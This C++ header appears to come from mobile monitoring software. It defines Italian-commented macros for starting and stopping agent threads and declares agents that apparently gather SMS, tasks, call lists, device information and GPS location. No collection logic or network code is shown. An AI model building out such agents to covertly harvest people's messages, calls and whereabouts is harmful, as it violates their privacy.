#include "Common.h"
#include "Log.h"
#include "GPS.h"
#include <exception>
using namespace std;

#ifndef __Agents_h__
#define __Agents_h__

#define AGENT_I_AM_ALIVE 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID){ \
	(*iter)->uAgentStatus = AGENT_RUNNING; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

#define AGENT_STOP_ME 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID){ \
	(*iter)->uAgentStatus = AGENT_STOPPED; \
	(*iter)->uCommand = 0; \
	UNLOCK(statusObj->hAgentsLock); \
	return TRUE; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

#define AGENT_WAIT_FOR_STOP 	BOOL bStop = FALSE; \
	while(bStop == FALSE){ \
	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID && (*iter)->uCommand == AGENT_STOP){ \
	bStop = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock); \
	MiniSleep(1000); \
	}

#define AGENT_CHECK_FOR_STOP	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID && (*iter)->uCommand == AGENT_STOP){ \
	(*iter)->uAgentStatus = AGENT_STOPPED; \
	(*iter)->uCommand = 0; \
	UNLOCK(statusObj->hAgentsLock); \
	return TRUE; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

// Valorizza x a TRUE se il thread e' stato marcato per lo STOP, a FALSE altrimenti.
// Questa funzione, a differenza della AGENT_CHECK_FOR_STOP NON ferma il thread!
#define AGENT_QUERY_STOP(x) 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	x = FALSE; \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == MyID && (*iter)->uCommand == AGENT_STOP){ \
	x = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

// Valorizza x a TRUE quando l'agente con l'id Aid e' markato per lo stop
#define AGENT_ID_QUERY_STOP(Aid, x) 	WAIT_AND_SIGNAL(statusObj->hAgentsLock); \
	x = FALSE; \
	for(iter = agents->begin(); iter != agents->end(); iter++){ \
	if((*iter)->uAgentId == Aid && (*iter)->uCommand == AGENT_STOP){ \
	x = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hAgentsLock);

#define AGENT_COMMON_DATA(x) 	UINT MyID = x; \
	Status *statusObj = Status::self(); \
	list<AgentStruct *>::iterator iter; \
	list<AgentStruct *> *agents; \
	pAgentStruct myData = (pAgentStruct)lpParam;


DWORD WINAPI SmsAgent(LPVOID lpParam);
DWORD WINAPI TaskAgent(LPVOID lpParam);
DWORD WINAPI CallListAgent(LPVOID lpParam);
DWORD WINAPI DeviceInfoAgent(LPVOID lpParam);
DWORD WINAPI GpsAgent(LPVOID lpParam);

VOID FAR PASCAL lineCallbackFunc(DWORD hDevice, DWORD dwMsg, DWORD dwCallbackInstance, 
								 DWORD dwParam1, DWORD dwParam2, DWORD dwParam3);

BOOL AgentSleep(UINT Id, UINT uMillisec);

#endif